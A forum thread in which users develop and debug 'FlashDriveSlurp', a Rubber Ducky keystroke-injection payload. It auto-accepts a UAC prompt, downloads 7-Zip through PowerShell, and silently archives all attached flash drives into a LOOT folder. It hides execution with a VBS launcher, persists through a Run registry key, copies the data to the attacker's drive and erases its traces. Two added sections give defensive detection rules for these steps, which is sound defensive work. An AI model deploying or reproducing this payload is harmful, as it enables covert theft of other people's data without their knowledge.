overwraith Posted November 16, 2013 (edited)

Hi all, been a while since I posted last. Am working on another batch payload that searches for flash drives on a system, and then 7zips them to a location on the machine. Not sure how I am going to exfiltrate the data; could be a flash drive, or use some other tool that can command line email. The following lines of code can be copied and pasted directly into the command prompt, just watch out for formatting issues; sometimes when copying and pasting the computer adds newlines where there shouldn't be any.

REM *** Make the destination we are 7Zipping to. ***
set destination=%TEMP%\LOOT\%COMPUTERNAME%
mkdir %destination%

REM *** Get the attached flash drives letters and drive names. ***
REM *** setlocal EnableDelayedExpansion may need replaced with cmd /V:ON . ***
setlocal EnableDelayedExpansion
set letters=
set drivename=

REM *** Check for removable drives, that are healthy, omitting the ducky drive. ***
for /f "tokens=3,4 delims= " %A in ('echo list volume ^| diskpart ^| findstr "Volume" ^| findstr "Removable" ^| findstr "Healthy" ^| findstr /V "DUCKY"') do (set letters=!letters! %A & set drivename=!drivename! %B)
echo %letters%
echo %drivename%

REM *** 7zip the found flash drives. ***

The biggest problem now will be reading those two lists pairwise, and sending the drive letters and drive names to the 7zip application. I may have to re-work a few things, and use batch "arrays" in the final product instead of using spaces to separate list elements. I plan on sending this all to some sort of batch file, and having it run every minute or so until an exfiltration flash drive is plugged in. Help is always welcome. This may all seem kind of useless, but I have seen plenty of computers where everybody logs into the same account, and you can still dump scripts to them.

Edited November 16, 2013 by overwraith
overwraith (Author) Posted November 19, 2013 (edited)

Latest update, getting closer to an actual payload. Eventually this will be able to either knowingly, or unknowingly, 'backup' all your friends' flash drives.

REM *** Make the destination we are 7zipping to. ***
set destination=%TEMP%\LOOT\%COMPUTERNAME%
mkdir %destination%

REM *** Get the attached flash drives letters and drive names. ***
REM *** setlocal EnableDelayedExpansion may need replaced with cmd /V:ON . ***
setlocal EnableDelayedExpansion
set letters=
set drivename=

REM *** Check for removable drives, that are healthy, omitting the ducky drive. ***
for /f "tokens=3,4 delims= " %A in ('echo list volume ^| diskpart ^| findstr "Volume" ^| findstr "Removable" ^| findstr "Healthy" ^| findstr /V "DUCKY"') do (set letters=!letters! %A & set drivename=!drivename! %B)
echo %letters%
echo %drivename%

REM *** 7zip the found flash drives. ***
set i=0
for %a in (%letters%) do set /A i+=1 & set letters[!i!]=%a
set i=0
for %a in (%drivename%) do set /A i+=1 & set drivename[!i!]=%a

REM *** Set number to length of the array. ***
set n=%i%
REM for /L %i in (1,1,%n%) do echo !letters[%i]! and !drivename[%i]!
for /L %i in (1,1,%n%) do 7z a -t7z %destination%\!drivename[%i]!.7z !letters[%i]!:\*

Got this to work using someone else's code here: http://stackoverflow.com/questions/8039128/batch-script-in-dos-traverse-multiple-lists-pairwise

Again, this is not a batch file yet, just copy and paste into the command prompt. Command prompt can handle multiple lines ok. Also, I believe that 7zip has a command line install option. Takes a pretty long time to zip; may need to use another algorithm, not zip, or zip to another location and have yet another batch process managing the zipping of files from the first C drive location.

Edited November 19, 2013 by overwraith
th3l0b3 Posted November 19, 2013 (edited)

I was working on this a bit yesterday and this morning. I came up with a way of finding all "removable drives" and collected drive letters.

List drives:

@ECHO OFF
for %%1 in (a b c d e f g h i j k l m n o p q r s t u v w x y z) do (
fsutil fsinfo drivetype %%1: |FIND /V "Directory")

I could use

Listdrives.bat | Findstr "Removable" > test.txt

and it would display the removable drives with an output. Remove the extra information in the txt file with another batch file:

@Echo OFF
(For /F "Usebackq Tokens=*" %%# in ("test.txt") Do (
Echo "%%#" | FIND /I " - Removable Drive" 1>NUL && (
Set "Line=%%#"
Call Set "Line=%%Line:~0,-18%%"
Call Echo %%Line%%
) || (
Echo %%#
)
))>"MyNewFile.txt"
Pause&Exit

From here you can have each drive as its own variable with

< MyNewFile.txt (
set /p line1=
set /p line2=
set /p line3=
)

Your way looks much cleaner hahaha.

Edited November 19, 2013 by th3l0b3
overwraith (Author) Posted November 19, 2013 (edited)

I am happy to hear that somebody is interested in this new payload. I will probably base the full payload either on that generic batch payload I wrote, or the duck slurp payload. Stay tuned for more stuff.

...

Here is a payload I am troubleshooting. There seems to be an error in the logic; the script appears to stop working if the "DUCKY" drive is not plugged in. When I restart the script after the drive has been plugged in, the script will then continue semi-normal execution by zipping drives to the destination, but it does not xcopy the results to the "DUCKY" exfiltration drive. Here is the problem code payload.

REM Author: overwraith
REM Name: FlashDriveSlurp.txt
REM Purpose: Copies flash drives to the hard drive for later exfiltration.
REM Encoder V2.4+

REM *** Initial Delay ***
DELAY 2000

REM *** Bypass UAC ***
REM Using the run command for a broader OS base.
GUI r
DELAY 250
STRING powershell Start-Process cmd.exe -Verb runAs
ENTER
DELAY 1500
ALT y
DELAY 500
ENTER

REM *** Change directories because System32 appears to be protected. ***
REM Navigate to %TEMP% location first, as a default directory.
STRING CD %TEMP%
ENTER
REM Ideally we will navigate to this location if it is not locked down.
STRING CD C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\
ENTER

REM *** Delete batch file if it already exists. ***
STRING erase /Q FlashDriveSlurp.bat
ENTER

REM *** Make batch file that copies flash drive data. ***
STRING copy con FlashDriveSlurp.bat
ENTER
STRING @ECHO OFF
ENTER
STRING setlocal EnableDelayedExpansion
ENTER

REM *** Make the destination we are 7zipping to. ***
STRING set destination=%TEMP%\LOOT\%COMPUTERNAME%
ENTER
STRING mkdir %destination%
ENTER
STRING :while1
ENTER

REM *** Determine if "DUCKY" drive is plugged in, if so exfiltrate the data. ***
STRING for /f "tokens=3 delims= " %%A in ('echo list volume ^| diskpart ^| findstr "DUCKY"') do (set DUCKYdrive=%%A:)
ENTER
STRING if [%DUCKYdrive%] EQU [] (
ENTER
STRING goto :break
ENTER
STRING )
ENTER

REM *** Get the attached flash drives letters and drive names. ***
STRING set letters=
ENTER
STRING set drivename=
ENTER
STRING for /f "tokens=3,4 delims= " %%A in ('echo list volume ^| diskpart ^| findstr "Volume" ^| findstr "Removable" ^| findstr "Healthy" ^| findstr /V "DUCKY"') do (set letters=!letters! %%A & set drivename=!drivename! %%B)
ENTER

REM *** 7zip the found flash drives. ***
STRING set i=0
ENTER
STRING for %%a in (%letters%) do set /A i+=1 & set letters[!i!]=%%a
ENTER
STRING set i=0
ENTER
STRING for %%a in (%drivename%) do set /A i+=1 & set drivename[!i!]=%%a
ENTER
REM Set number to length of the array.
STRING set n=%i%
ENTER
STRING for /L %%i in (1,1,%n%) do 7z u -t7z %destination%\!drivename[%%i]!.7z !letters[%%i]!:\*
ENTER
STRING timeout /t 30
ENTER
STRING goto :while1
ENTER
STRING :break
ENTER
STRING xcopy %destination% %DUCKYdrive%
ENTER

REM *** Terminate execution after copying to ducky drive. ***
CONTROL z
ENTER

REM *** Delete Invisible vbs file if already exists. ***
STRING erase /Q invis.vbs
ENTER

REM *** Make VBS file to run invisibly. ***
STRING copy con invis.vbs
ENTER
STRING CreateObject("Wscript.Shell").Run """" & WScript.Arguments(0) & """", 0, False
ENTER
CONTROL Z
ENTER

REM *** Run the batch file invisibly. ***
STRING wscript.exe invis.vbs FlashDriveSlurp.bat
ENTER

REM *** Exit ***
STRING EXIT
ENTER

Here is the resulting batch file:

@ECHO OFF
setlocal EnableDelayedExpansion
set destination=%TEMP%\LOOT\%COMPUTERNAME%
mkdir %destination%
:while1
for /f "tokens=3 delims= " %%A in ('echo list volume ^| diskpart ^| findstr "DUCKY"') do (set DUCKYdrive=%%A:)
if [%DUCKYdrive%] EQU [] (
goto :break
)
set letters=
set drivename=
for /f "tokens=3,4 delims= " %%A in ('echo list volume ^| diskpart ^| findstr "Volume" ^| findstr "Removable" ^| findstr "Healthy" ^| findstr /V "DUCKY"') do (set letters=!letters! %%A & set drivename=!drivename! %%B)
set i=0
for %%a in (%letters%) do set /A i+=1 & set letters[!i!]=%%a
set i=0
for %%a in (%drivename%) do set /A i+=1 & set drivename[!i!]=%%a
set n=%i%
for /L %%i in (1,1,%n%) do 7z u -t7z %destination%\!drivename[%%i]!.7z !letters[%%i]!:\*
timeout /t 30
goto :while1
:break
xcopy %destination% %DUCKYdrive%

Similarly to the DuckySlurp payload, this one will work best with a high speed, high volume removable drive labeled "DUCKY". For testing purposes, however, use whatever small flash drive you want.

Edited November 19, 2013 by overwraith
th3l0b3 Posted November 19, 2013

I am down, seems like it will be a good thing to have in the utility belt. =]
overwraith (Author) Posted November 19, 2013 (edited)

Fixed some of the bugs. Still need to install 7zip with duckscript.

REM Author: overwraith
REM Name: FlashDriveSlurp.txt
REM Purpose: Copies flash drives to the hard drive for later exfiltration.
REM Encoder V2.4+

REM *** Initial Delay ***
DELAY 2000

REM *** Bypass UAC ***
REM Using the run command for a broader OS base.
GUI r
DELAY 250
STRING powershell Start-Process cmd.exe -Verb runAs
ENTER
DELAY 1500
ALT y
DELAY 500
ENTER

REM *** Change directories because System32 appears to be protected. ***
REM Navigate to %TEMP% location first, as a default directory.
STRING CD %TEMP%
ENTER
REM Ideally we will navigate to this location if it is not locked down.
STRING CD C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\
ENTER

REM *** Delete batch file if it already exists. ***
STRING erase /Q FlashDriveSlurp.bat
ENTER

REM *** Make batch file that copies flash drive data. ***
STRING copy con FlashDriveSlurp.bat
ENTER
STRING @ECHO OFF
ENTER
STRING setlocal EnableDelayedExpansion
ENTER

REM *** Make the destination we are 7zipping to. ***
STRING set destination=%TEMP%\LOOT\%COMPUTERNAME%
ENTER
STRING mkdir %destination%
ENTER
STRING :while1
ENTER

REM *** Determine if "DUCKY" drive is plugged in, if so exfiltrate the data. ***
STRING for /f "tokens=3 delims= " %%A in ('echo list volume ^| diskpart ^| findstr "DUCKY"') do (set DUCKYdrive=%%A)
ENTER
STRING if [%DUCKYdrive%] NEQ [] (
ENTER
STRING goto :break
ENTER
STRING )
ENTER

REM *** Get the attached flash drives letters and drive names. ***
STRING set letters=
ENTER
STRING set drivename=
ENTER
STRING for /f "tokens=3,4 delims= " %%A in ('echo list volume ^| diskpart ^| findstr "Volume" ^| findstr "Removable" ^| findstr "Healthy" ^| findstr /V "DUCKY"') do (set letters=!letters! %%A & set drivename=!drivename! %%B)
ENTER

REM *** 7zip the found flash drives. ***
STRING set i=0
ENTER
STRING for %%a in (%letters%) do set /A i+=1 & set letters[!i!]=%%a
ENTER
STRING set i=0
ENTER
STRING for %%a in (%drivename%) do set /A i+=1 & set drivename[!i!]=%%a
ENTER
REM Set number to length of the array.
STRING set n=%i%
ENTER
STRING for /L %%i in (1,1,%n%) do 7z u -t7z %destination%\!drivename[%%i]!.7z !letters[%%i]!:\*
ENTER
STRING timeout /t 30
ENTER
STRING goto :while1
ENTER
STRING :break
ENTER

REM *** Copy to the ducky drive. ***
STRING xcopy %destination%\* %DUCKYdrive%:\LOOT\%COMPUTERNAME% /I
ENTER

REM *** Terminate execution, clean up after script. ***
STRING erase /Q *.7z
ENTER
STRING rmdir /S /Q %TEMP%\LOOT
ENTER
STRING erase invis.vbs
ENTER
STRING erase /Q %0
ENTER
CONTROL z
ENTER

REM *** Delete Invisible vbs file if already exists. ***
STRING erase /Q invis.vbs
ENTER

REM *** Make VBS file to run invisibly. ***
STRING copy con invis.vbs
ENTER
STRING CreateObject("Wscript.Shell").Run """" & WScript.Arguments(0) & """", 0, False
ENTER
CONTROL Z
ENTER

REM *** Run the batch file invisibly. ***
STRING wscript.exe invis.vbs FlashDriveSlurp.bat
ENTER

REM *** Exit ***
STRING EXIT
ENTER

Edited November 20, 2013 by overwraith
overwraith (Author) Posted November 20, 2013

I have been trying to get the powershell download and execute script working with this modified silent install procedure. Can anybody see why the powershell window is erroring when this is entered?

DELAY 3000
GUI r
DELAY 100
STRING powershell (new-object System.Net.WebClient).DownloadFile('http://downloads.sourceforge.net/sevenzip/7z920.exe','%TEMP%\7z920.exe');
DELAY 100
STRING Start-Process "%TEMP%\7z920.exe /S /D=%PROGRAMFILES%\7-Zip\"
ENTER

The webpage I am getting the 7zip links from is here: http://www.7-zip.org/download.html
th3l0b3 Posted November 20, 2013

Any reason you are downloading the installer rather than using the 7za.exe that is command line driven? I have been using the 7za.exe stand alone for a long time, and it works great. I am just curious. http://t0xicra1n.com/7za.exe
overwraith (Author) Posted November 20, 2013 (edited)

No reason, I guess the command line installer would be better. I will see if that fixes the error.

...

It appears that the 7za file on 7zip/sourceforge's site is zipped. This could get messy. I still don't know how we are supposed to send command line arguments to executables in the powershell code; don't know much powershell.

Edited November 20, 2013 by overwraith
overwraith (Author) Posted November 20, 2013

Now have some code for unzipping in powershell:

$shell = new-object -com shell.application
$zip = $shell.NameSpace(“%temp%\7za920.zip”)
foreach($item in $zip.items())
{
$shell.Namespace(“%temp%”).copyhere($item)
}

Must be run through the GUI+R run window, so %TEMP% is replaced with the file path. The following code runs fine, and unzips the zip file.

powershell -noexit $shell = new-object -com shell.application; $zip = $shell.NameSpace(“%temp%\7za920.zip”); foreach($item in $zip.items()) { $shell.Namespace(“%temp%”).copyhere($item) }

When I glue this command to the end of the powershell download command, bad stuff happens.

powershell -noexit (new-object System.Net.WebClient).DownloadFile('http://downloads.sourceforge.net/sevenzip/7za920.zip','%TEMP%\7za920.zip');$shell = new-object -com shell.application; $zip = $shell.NameSpace(“%temp%\7za920.zip”); foreach($item in $zip.items()) { $shell.Namespace(“%temp%”).copyhere($item) }

The following is the error that shows up:

The string is missing the terminator: ".
+ CategoryInfo : ParserError: (:) [], ParentContainsErrorRecordException
+ FullyQualifiedErrorId : TerminatorExpectedAtEndOfString

I got this code for unzipping at the following location: http://www.howtogeek.com/tips/how-to-extract-zip-files-using-powershell/
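Added example (not code from this thread or its author), written from the defender's side: a small set of process-creation detection rules for the command-line shapes the posts above produce, namely cmd.exe started by wscript.exe to run a .bat in a temp directory, diskpart driven by "echo list volume", 7-Zip archiving an entire drive root into a temp directory, and a single PowerShell line that both downloads with System.Net.WebClient and unpacks with Shell.Application. The sample events, the user name "u", host name "HOST1", volume label "KINGSTON" and the example.invalid URL are constructed for the example, and the (parent, image, command line) layout is a stand-in for whatever your sensor records, not any product's real log format.

```python
"""Detection rules for the command-line patterns used by the flash-drive
slurp payload in this thread.  Added example; telemetry below is constructed
and uses a plain (parent, image, cmdline) layout, not a real log format."""
import re
from dataclasses import dataclass


@dataclass
class ProcessEvent:
    parent: str    # image name of the parent process
    image: str     # image name of the created process
    cmdline: str   # full command line as recorded by the sensor


def scripted_diskpart_enumeration(e: ProcessEvent) -> bool:
    """diskpart driven non-interactively by an echoed script command."""
    return re.search(r"echo\s+list\s+(volume|disk)\s*\|\s*diskpart",
                     e.cmdline, re.I) is not None


def archive_drive_root_to_temp(e: ProcessEvent) -> bool:
    """7-Zip writing an archive under a temp directory from a whole drive root (X:\\*)."""
    if e.image.lower() not in {"7z.exe", "7za.exe"}:
        return False
    to_temp = re.search(r"\\temp\\.*\.7z", e.cmdline, re.I) is not None
    from_root = re.search(r"\s[A-Z]:\\\*", e.cmdline, re.I) is not None
    return to_temp and from_root


def powershell_download_then_unpack(e: ProcessEvent) -> bool:
    """One PowerShell command line that both downloads a file and unpacks it."""
    c = e.cmdline.lower()
    return (e.image.lower() == "powershell.exe"
            and "webclient" in c and "downloadfile" in c
            and ("shell.application" in c or "copyhere" in c))


def script_host_launching_temp_batch(e: ProcessEvent) -> bool:
    """cmd.exe spawned by a script host to run a .bat stored in a temp directory."""
    return (e.parent.lower() in {"wscript.exe", "cscript.exe"}
            and e.image.lower() == "cmd.exe"
            and re.search(r'\\temp\\[^"]*\.bat', e.cmdline, re.I) is not None)


RULES = [
    ("script_host_launching_temp_batch", script_host_launching_temp_batch),
    ("scripted_diskpart_enumeration", scripted_diskpart_enumeration),
    ("archive_drive_root_to_temp", archive_drive_root_to_temp),
    ("powershell_download_then_unpack", powershell_download_then_unpack),
]


def evaluate(events):
    """Return (event index, rule name) for every rule that matches an event."""
    return [(i, name) for i, e in enumerate(events)
            for name, rule in RULES if rule(e)]


# Constructed sample telemetry: the first four mirror the thread's commands
# (user, host, label and URL invented); the last two are benign look-alikes
# (an admin running diskpart by hand, a personal 7-Zip backup) that must not fire.
SAMPLE_EVENTS = [
    ProcessEvent("wscript.exe", "cmd.exe",
                 r'cmd /c ""C:\Users\u\AppData\Local\Temp\FlashDriveSlurp.bat""'),
    ProcessEvent("cmd.exe", "cmd.exe",
                 r'cmd /c echo list volume | diskpart | findstr "Volume" | findstr "Removable"'),
    ProcessEvent("cmd.exe", "7z.exe",
                 r'7z u -t7z C:\Users\u\AppData\Local\Temp\LOOT\HOST1\KINGSTON.7z E:\*'),
    ProcessEvent("cmd.exe", "powershell.exe",
                 r"powershell (new-object System.Net.WebClient).DownloadFile('http://example.invalid/7za920.zip','C:\Users\u\AppData\Local\Temp\7za920.zip'); $shell = new-object -com shell.application"),
    ProcessEvent("explorer.exe", "diskpart.exe", "diskpart"),
    ProcessEvent("explorer.exe", "7z.exe",
                 r'7z a -t7z D:\backup\photos.7z C:\Users\u\Pictures\*'),
]

if __name__ == "__main__":
    for idx, rule_name in evaluate(SAMPLE_EVENTS):
        print(f"event {idx}: {rule_name} -> {SAMPLE_EVENTS[idx].cmdline}")
```

Each rule is deliberately narrow on one step of the chain; correlating two or more of them on the same host within a short window is what separates this payload from an administrator who runs diskpart or 7-Zip by hand, which is why the two benign events at the end are part of the sample.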
overwraith (Author) Posted November 22, 2013 (edited)

Not sure why it works, but these powershell commands can be typed into a command window, and they work. Not getting the errors that I was getting in the run box. The run box might have a character limit, or something. I am also going to have to tweak the script to use registry keys instead of using the "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\" folder I was using, because without the registry key it will not start up silently.

Edited November 23, 2013 by overwraith
overwraith (Author) Posted November 23, 2013 (edited)

This appears to function correctly. I think this is as good a version as any to call a "release version".

REM Author: overwraith
REM Name: FlashDriveSlurp.txt
REM Purpose: Copies flash drives to the hard drive for later exfiltration.
REM Encoder V2.4+

REM *** Initial Delay ***
DELAY 2000

REM *** Bypass UAC ***
REM Using the run command for a broader OS base.
GUI r
DELAY 250
STRING powershell Start-Process cmd.exe -Verb runAs
ENTER
DELAY 1500
ALT y
DELAY 500
ENTER

REM *** Navigate to %TEMP%. ***
STRING cd %TEMP%
ENTER

REM *** Delete 7zip files if they already exist. ***
STRING erase /Q 7za.exe 7z920.zip 7-zip.chm license.txt readme.txt
ENTER

REM *** Install 7zip. ***
STRING powershell (new-object System.Net.WebClient).DownloadFile('http://downloads.sourceforge.net/sevenzip/7za920.zip','%TEMP%\7za920.zip'); $shell = new-object -com shell.application; $zip = $shell.NameSpace('%TEMP%\7za920.zip'); foreach($item in $zip.items()) { $shell.Namespace('%TEMP%').copyhere($item) }Start-Process '%TEMP%\7za.exe' -ArgumentList '/S /D=%PROGRAMFILES%\7-Zip\'
ENTER

REM *** Delay 7 Seconds. ***
DELAY 7000

REM *** Switch from powershell back to command line. ***
STRING CMD
ENTER

REM *** Delete batch file if it already exists. ***
STRING erase /Q FlashDriveSlurp.bat
ENTER

REM *** Make batch file that copies flash drive data. ***
STRING copy con FlashDriveSlurp.bat
ENTER
STRING @ECHO OFF
ENTER
STRING setlocal EnableDelayedExpansion
ENTER

REM *** Registry key that restarts script on reboot. ***
STRING REG ADD HKLM\Software\Microsoft\Windows\CurrentVersion\Run /v Persistence /t REG_SZ /d "wscript.exe %TEMP%\invis.vbs %TEMP%\FlashDriveSlurp.bat" /f
ENTER

REM *** Make the destination we are 7zipping to. ***
STRING set destination=%TEMP%\LOOT\%COMPUTERNAME%
ENTER
STRING mkdir %destination%
ENTER
STRING :while1
ENTER

REM *** Determine if "DUCKY" drive is plugged in, if so exfiltrate the data. ***
STRING for /f "tokens=3 delims= " %%A in ('echo list volume ^| diskpart ^| findstr "DUCKY"') do (set DUCKYdrive=%%A)
ENTER
STRING if [%DUCKYdrive%] NEQ [] (
ENTER
STRING goto :break
ENTER
STRING )
ENTER

REM *** Get the attached flash drives letters and drive names. ***
STRING set letters=
ENTER
STRING set drivename=
ENTER
STRING for /f "tokens=3,4 delims= " %%A in ('echo list volume ^| diskpart ^| findstr "Volume" ^| findstr "Removable" ^| findstr "Healthy" ^| findstr /V "DUCKY"') do (set letters=!letters! %%A & set drivename=!drivename! %%B)
ENTER

REM *** 7zip the found flash drives. ***
STRING set i=0
ENTER
STRING for %%a in (%letters%) do set /A i+=1 & set letters[!i!]=%%a
ENTER
STRING set i=0
ENTER
STRING for %%a in (%drivename%) do set /A i+=1 & set drivename[!i!]=%%a
ENTER
REM Set number to length of the array.
STRING set n=%i%
ENTER
STRING for /L %%i in (1,1,%n%) do 7z u -t7z %destination%\!drivename[%%i]!.7z !letters[%%i]!:\*
ENTER
STRING timeout /t 30
ENTER
STRING goto :while1
ENTER
STRING :break
ENTER

REM *** Copy to the ducky drive. ***
STRING xcopy %destination%\* %DUCKYdrive%:\LOOT\%COMPUTERNAME% /I
ENTER

REM *** Terminate execution, clean up after script. ***
STRING erase /Q *.7z
ENTER
STRING rmdir /S /Q %TEMP%\LOOT
ENTER
STRING erase invis.vbs
ENTER
STRING erase /Q %0
ENTER
CONTROL z
ENTER

REM *** Delete Invisible vbs file if already exists. ***
STRING erase /Q invis.vbs
ENTER

REM *** Make VBS file to run invisibly. ***
STRING copy con invis.vbs
ENTER
STRING CreateObject("Wscript.Shell").Run """" & WScript.Arguments(0) & """", 0, False
ENTER
CONTROL Z
ENTER

REM *** Run the batch file invisibly. ***
STRING wscript.exe invis.vbs FlashDriveSlurp.bat
ENTER

REM *** Exit ***
STRING EXIT
ENTER
STRING EXIT
ENTER

Edited November 23, 2013 by overwraith
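Added example (not code from this thread or its author), again from the defender's side: the "release version" above persists through a REG ADD to HKLM\...\CurrentVersion\Run whose value starts wscript.exe with a launcher .vbs that in turn runs a .bat, both living in %TEMP%. The scanner below scores Run-key values on exactly those three traits (script-host launcher, script in a temp directory, one script handed another script to run) so that a vendor's own cscript.exe updater in Program Files stays below the alert threshold. The sample values, the user name "u" and the "VendorUpdater" entry are constructed; on a Windows host read_run_entries_from_registry() reads the real HKLM and HKCU Run keys through the standard winreg module, and the names assess_run_entry and suspicious_entries are this example's own.

```python
"""Score autostart (Run key) values for the script-host persistence shape used
by the payload in this thread.  Added example; sample entries are constructed."""
import ntpath
import re

SCRIPT_HOSTS = {"wscript.exe", "cscript.exe", "mshta.exe"}
TEMP_DIR = re.compile(r"(%temp%|\\temp\\)", re.I)          # expanded or literal %TEMP%
SCRIPT_FILE = re.compile(r"\.(vbs|vbe|js|jse|wsf|bat|cmd|ps1)$", re.I)


def split_command(value: str):
    """Tokenise a Windows command string, keeping double-quoted paths together."""
    return [t.strip('"') for t in re.findall(r'"[^"]*"|\S+', value)]


def assess_run_entry(value: str):
    """Return the list of reasons an autostart value looks like script persistence."""
    tokens = split_command(value)
    if not tokens:
        return []
    reasons = []
    launcher = ntpath.basename(tokens[0]).lower()   # ntpath handles backslashes on any OS
    if launcher in SCRIPT_HOSTS:
        reasons.append(f"launched through a script host ({launcher})")
    scripts = [t for t in tokens[1:] if SCRIPT_FILE.search(t)]
    if any(TEMP_DIR.search(t) for t in scripts):
        reasons.append("script stored in a temp directory")
    if len(scripts) >= 2:
        reasons.append("one script is passed another script to run")
    return reasons


def suspicious_entries(entries, threshold=2):
    """Names of entries with at least `threshold` reasons, in input order."""
    return [name for name, value in entries.items()
            if len(assess_run_entry(value)) >= threshold]


def read_run_entries_from_registry():
    """Read the HKLM and HKCU Run keys on Windows; returns {} on other platforms."""
    try:
        import winreg
    except ImportError:
        return {}
    entries = {}
    for hive in (winreg.HKEY_LOCAL_MACHINE, winreg.HKEY_CURRENT_USER):
        try:
            key = winreg.OpenKey(hive, r"Software\Microsoft\Windows\CurrentVersion\Run")
        except OSError:
            continue
        index = 0
        while True:
            try:
                name, data, _ = winreg.EnumValue(key, index)
            except OSError:          # no more values
                break
            entries[name] = str(data)
            index += 1
        winreg.CloseKey(key)
    return entries


# Constructed sample values.  "Persistence" is the shape the thread's REG ADD
# line leaves once %TEMP% has expanded (user name invented); the rest are benign
# look-alikes, including a vendor script that is NOT in a temp directory.
SAMPLE_RUN_ENTRIES = {
    "Persistence": r"wscript.exe C:\Users\u\AppData\Local\Temp\invis.vbs C:\Users\u\AppData\Local\Temp\FlashDriveSlurp.bat",
    "OneDrive": r'"C:\Users\u\AppData\Local\Microsoft\OneDrive\OneDrive.exe" /background',
    "SecurityHealth": r"%windir%\system32\SecurityHealthSystray.exe",
    "VendorUpdater": r'cscript.exe //nologo "C:\Program Files\Vendor\update.vbs"',
}

if __name__ == "__main__":
    entries = read_run_entries_from_registry() or SAMPLE_RUN_ENTRIES
    for name in suspicious_entries(entries):
        print(name, "->", "; ".join(assess_run_entry(entries[name])))
```

The value name "Persistence" is the thread's choice and is not something to key on; the traits are what survive a rename, and the same scoring applies to RunOnce, the per-user Run key and Startup-folder shortcuts if you feed their command strings in.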